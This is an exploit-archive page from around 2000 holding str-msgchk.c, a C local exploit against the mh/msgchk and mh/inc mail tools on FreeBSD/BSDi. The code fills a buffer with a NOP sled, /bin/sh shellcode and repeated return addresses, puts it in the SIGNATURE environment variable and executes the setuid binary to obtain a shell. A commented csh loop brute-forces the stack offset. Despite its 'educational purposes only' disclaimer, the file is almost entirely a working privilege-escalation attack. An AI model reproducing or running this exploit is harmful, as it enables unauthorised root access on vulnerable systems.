str-msgchk.c

str-msgchk.c: Posted Apr 3, 2000; Authored by Stran9er | Site hack.co.za; mh/msgchk and mh/inc demonstration local exploit for FreeBSD / BSDI.; tags | exploit, local; systems | freebsd; SHA-256 | 2bfbb7210f09b6f9327cad291bd8de8bb5765b54244ea6522c9bdd9383c87417; Download | Favorite | View

str-msgchk.c

/* private */
/*
 * mh/msgchk, mh/inc _demonstration_ LOCAL exploit for FreeBSD/BSDi
 *   ( ported from linux ) 4-Apr-1998 by stran9er
 *
 * Based:
 *   on some bsd_lpr_exploit.c by unknown author..
 *   and info from bugtraq
 *
 * Disclaimer:
 *   this program is for (demo) educational purposes only.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET        1000
 /*   700..1500  step 100 */
 /* -3700..-2700 step 100 */
 /*  -1000 for bsdi4
  *
#!/bin/csh
set v = -5000
while ($v < 5000)
echo try $v
./mh684bsd $v
@ v+=100
end
  *
  */

#define BUFFER_SIZE           4000
#define BUFFER_NOP            999

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

main(int argc, char **argv)
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   int offset = DEFAULT_OFFSET;

   char execshell[] =
      "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
      "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
      "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
      "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

   int i;
   if (argc>1) offset = atoi(argv[1]);
   fprintf (stderr,"\nUsing offset %d (esp==%x)\n",offset,get_esp());
   buff = malloc(BUFFER_SIZE);
   if(!buff) {printf("can't allocate memory\n");exit(0);}

   ptr = buff;

   memset(ptr, 0x90, BUFFER_SIZE);

   ptr += BUFFER_NOP-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i<(BUFFER_SIZE-BUFFER_NOP)/4;i++)
      *(addr_ptr++) = get_esp() + offset;

   ptr = (char *)addr_ptr;
   *ptr = 0;
   strncpy (buff,":)From:md@lspvs.sorosis.ro  ",28); /* i said - ported from linux.. */

   fprintf (stderr,"\nesp+offset==%x\n",get_esp()+offset);
   setenv("SIGNATURE",buff,1);
   execl ("/usr/contrib/mh/bin/msgchk", "msgchk", NULL);
//   execl ("/usr/contrib/mh/bin/inc", "inc", NULL);
   fprintf (stderr,"execl error...");
}
/*                    www.hack.co.za                    */
/* private */

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

str-msgchk.c

str-msgchk.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

str-msgchk.c

Share This

str-msgchk.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems